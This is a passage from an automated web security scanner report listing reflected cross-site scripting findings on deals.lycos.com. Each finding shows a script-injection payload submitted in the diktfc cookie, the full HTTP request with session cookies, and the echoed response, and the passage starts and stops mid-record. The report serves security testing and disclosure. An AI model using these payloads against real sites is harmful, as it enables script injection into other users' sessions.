g src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16&amp;cj=1" alt="tracker" />
...[SNIP]...

3.181. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa24"><script>alert(1)</script>1fe7a425fe9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9&amp;cj=1" alt="tracker" />
...[SNIP]...

3.182. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce470"%3balert(1)//88a1fe2d76c was submitted in the diktfc cookie. This input was echoed as ce470";alert(1)//88a1fe2d76c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ace470"%3balert(1)//88a1fe2d76c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ace470";alert(1)//88a1fe2d76c"
});
</script>
...[SNIP]...

3.183. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e7d6"%3balert(1)//c92b2a5a915 was submitted in the diktfc cookie. This input was echoed as 9e7d6";alert(1)//c92b2a5a915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9e7d6"%3balert(1)//c92b2a5a915; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9e7d6";alert(1)//c92b2a5a915"
});
</script>
...[SNIP]...

3.184. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c56d7"><script>alert(1)</script>c863840866d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d&amp;cj=1" alt="tracker" />
...[SNIP]...

3.185. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/free-iphone-applications-413656

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48163"><script>alert(1)</script>6916582d15c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/free-iphone-applications-413656 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/free-iphone-applications-413656&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c&amp;cj=1" alt="tracker" />
...[SNIP]...

3.186. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/free-iphone-applications-413656

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f8d2"%3balert(1)//6cf56fb792b was submitted in the diktfc cookie. This input was echoed as 2f8d2";alert(1)//6cf56fb792b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/free-iphone-applications-413656 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f8d2"%3balert(1)//6cf56fb792b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
e="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/free-iphone-applications-413656",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f8d2";alert(1)//6cf56fb792b"
});
</script>
...[SNIP]...

3.187. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/hp-home-coupons-up-to-400-off-414278

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62c4"><script>alert(1)</script>9c619f6f3d6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
g src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6&amp;cj=1" alt="tracker" />
...[SNIP]...

3.188. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/hp-home-coupons-up-to-400-off-414278

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5635"%3balert(1)//0d3ef562288 was submitted in the diktfc cookie. This input was echoed as a5635";alert(1)//0d3ef562288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa5635"%3balert(1)//0d3ef562288; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
xt/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa5635";alert(1)//0d3ef562288"
});
</script>
...[SNIP]...

3.189. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/iphone-app-price-cuts-deals-from-1-414092

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d30a"%3balert(1)//dda5081c78 was submitted in the diktfc cookie. This input was echoed as 1d30a";alert(1)//dda5081c78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d30a"%3balert(1)//dda5081c78; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
vascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d30a";alert(1)//dda5081c78"
});
</script>
...[SNIP]...

3.190. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/iphone-app-price-cuts-deals-from-1-414092

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23774"><script>alert(1)</script>f4fd1e37b84 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84&amp;cj=1" alt="tracker" />
...[SNIP]...

3.191. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kempler-and-strauss-watch-cell-phone-175-413939

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad3ea"><script>alert(1)</script>6be4c9f934a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
